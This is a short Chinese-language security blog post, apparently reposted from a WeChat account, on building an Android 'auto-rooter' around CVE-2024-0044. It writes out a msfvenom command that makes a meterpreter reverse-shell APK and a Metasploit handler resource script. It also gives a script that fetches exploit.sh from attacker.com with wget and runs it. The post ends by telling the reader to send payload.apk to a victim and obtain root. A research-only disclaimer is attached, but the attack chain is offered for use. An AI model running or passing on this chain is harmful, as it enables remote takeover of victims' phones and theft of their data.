Android 自动根目录
这只是一个心理记录,更多地是为了进一步探索此处所做工作的可能性:
https://rtx.meta.security/exploitation/2024/03/04/Android-run-as-forgery.html https://tinyhack.com/2024/06/07/extracting-whatsapp-database-or-any-app-data-from-android-12-13-using-cve-2024-0044/?s=03 https://www.mobile-hacker.com/2024/06/17/exfiltrate-sensitive-user-data-from-apps-on-android-12-and-13-using-cve-2024-0044-vulnerability/
最终,我想要一个可以自行执行的漏洞,但是要循序渐进,是的。
尝试一下
msfvenom -p android/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<attacker_port> R > payload.apk
创建资源脚本execute_script.rc来自动执行命令:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST <attacker_ip>
set LPORT <attacker_port>
exploit -j
set AutoRunScript multi_console_command -rc /path/to/commands.rc
使用必要的命令创建资源脚本:
cd /data/local/tmp
wget http://attacker.com/exploit.sh -O exploit.sh
chmod +x exploit.sh
./exploit.sh
使用资源脚本启动 Metasploit:
msfconsole -r execute_script.rc
开始派对吧:
msfconsole -r execute_script.rc
现在你的监听器/payload 传递已经设置好了... 发送 payload.apk 给受害者... 让我们获取一些 root 权限。
https://github.com/scs-labrat/android_autorooter
感谢您抽出
.
.
来阅读本文
点它,分享点赞在看都在这里
原文始发于微信公众号(Ots安全):利用 CVE-2024-0044 漏洞远程窃取 Android 12 和 13 应用程序中的敏感用户数据
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论